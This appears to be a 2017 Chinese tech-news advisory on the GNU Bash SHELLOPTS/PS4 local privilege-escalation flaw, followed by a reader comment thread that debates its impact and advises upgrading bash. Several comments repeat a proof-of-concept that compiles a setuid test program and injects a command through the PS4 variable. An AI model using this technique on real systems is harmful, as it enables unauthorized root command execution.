漏洞预警 GNU Bash 本地命令执行漏洞

2017年01月23日

近期历史悠久的 GNU Bash 爆出了一个高危漏洞,Bash < 4.4 版本存在安全漏洞,通过构造的 SHELLOPTS、PS4 环境变量,本地用户利用此漏洞可用 root 权限执行任意命令。

官方 CVSS V3 评级为 High,属于高危漏洞,预测当前 90% 以上的 Linux 用户都会受到影响。

http://www.openwall.com/lists/oss-security/2016/09/26/9

小编测试了一下,100% 命中:

各位站长,赶在过年之前快动起来吧

展开阅读全文
23 收藏
分享
加载中
精彩评论

引用来自“游客”的评论

妈的智障,谁没事会给程序 4755 的权限。😤
假设,你的web程序有漏洞,然后通过漏洞入侵进去拿到系统普通账号权限,然后进去自己创建文件,然后。。。
2017-01-23 11:15
1
举报
ubuntu 16.04.1
bash --version
GNU bash, version 4.3.46(1)-release (x86_64-pc-linux-gnu)
普通用户
gcc -xc - -otest <<< 'int main() { setuid(0); system("/usr/bin/touch /root/1"); }'
env -i SHELLOPTS=xtrace PS4='$(id)' ./test
/usr/bin/touch: cannot touch '/root/1': Permission denied

2017-01-23 10:58
1
举报
最新评论 (18)

引用来自“桔子”的评论

06年漏洞,现在发出来搞毛,脑子被驴踢了把
回复@桔子 : 漏洞有发现时间、公布时间和更新时间,06年9月发现,但是直到19号才公开,具体参见NVD链接:https://web.nvd.nist.gov/view/vuln/detail?spm=5176.7750219.2.4.3GmKFD&vulnId=CVE-2016-7543
2017-01-24 09:07
0
回复
举报
06年漏洞,现在发出来搞毛,脑子被驴踢了把
2017-01-23 23:48
0
回复
举报

引用来自“游客”的评论

妈的智障,谁没事会给程序 4755 的权限。😤

引用来自“妩媚的悟空”的评论

假设,你的web程序有漏洞,然后通过漏洞入侵进去拿到系统普通账号权限,然后进去自己创建文件,然后。。。

引用来自“li_Zero”的评论

可是你普通用户创建的文件用如上方法能也拿不到权闲呀,只有root的4755才有效呀
回复@li_Zero : 只要suid程序调用system/popen就会有问题,那个setuid调用只是用来演示
2017-01-23 15:29
0
回复
举报

引用来自“游客”的评论

妈的智障,谁没事会给程序 4755 的权限。😤

引用来自“妩媚的悟空”的评论

假设,你的web程序有漏洞,然后通过漏洞入侵进去拿到系统普通账号权限,然后进去自己创建文件,然后。。。
可是你普通用户创建的文件用如上方法能也拿不到权闲呀,只有root的4755才有效呀
2017-01-23 14:44
0
回复
举报
有已经受波及的没。。
2017-01-23 13:28
0
回复
举报
已经亲测可行......😅
2017-01-23 13:19
0
回复
举报

引用来自“ddatsh”的评论

ubuntu 16.04.1
bash --version
GNU bash, version 4.3.46(1)-release (x86_64-pc-linux-gnu)
普通用户
gcc -xc - -otest <<< 'int main() { setuid(0); system("/usr/bin/touch /root/1"); }'
env -i SHELLOPTS=xtrace PS4='$(id)' ./test
/usr/bin/touch: cannot touch '/root/1': Permission denied

引用来自“eechen”的评论

Ubuntu 14.04 LTS, Bash 4.3 同样提示 Permission denied 并没有root权限.

引用来自“ddatsh”的评论

所以特别鄙视这种标题很大,实际带不给我幸福感的文
不知道,可能是漏洞已经修复了,毕竟这个漏洞是2016/09/26去年的.
执行过sudo apt-get upgrade软件升级的可能都已经修复了.
所以还是建议大家upgrade一下软件:
sudo apt-get update 刷新软件列表
sudo apt-get upgrade 升级软件
sudo apt-get install bash 只升级bash
sudo shutdown -r now 重启生效
2017-01-23 12:17
0
回复
举报

引用来自“ddatsh”的评论

ubuntu 16.04.1
bash --version
GNU bash, version 4.3.46(1)-release (x86_64-pc-linux-gnu)
普通用户
gcc -xc - -otest <<< 'int main() { setuid(0); system("/usr/bin/touch /root/1"); }'
env -i SHELLOPTS=xtrace PS4='$(id)' ./test
/usr/bin/touch: cannot touch '/root/1': Permission denied

引用来自“eechen”的评论

Ubuntu 14.04 LTS, Bash 4.3 同样提示 Permission denied 并没有root权限.
所以特别鄙视这种标题很大,实际带不给我幸福感的文
2017-01-23 12:13
0
回复
举报

引用来自“ddatsh”的评论

ubuntu 16.04.1
bash --version
GNU bash, version 4.3.46(1)-release (x86_64-pc-linux-gnu)
普通用户
gcc -xc - -otest <<< 'int main() { setuid(0); system("/usr/bin/touch /root/1"); }'
env -i SHELLOPTS=xtrace PS4='$(id)' ./test
/usr/bin/touch: cannot touch '/root/1': Permission denied

Ubuntu 14.04 LTS, Bash 4.3 同样提示 Permission denied 并没有root权限.
2017-01-23 11:43
0
回复
举报
更多评论
18 评论
23 收藏
分享
返回顶部
顶部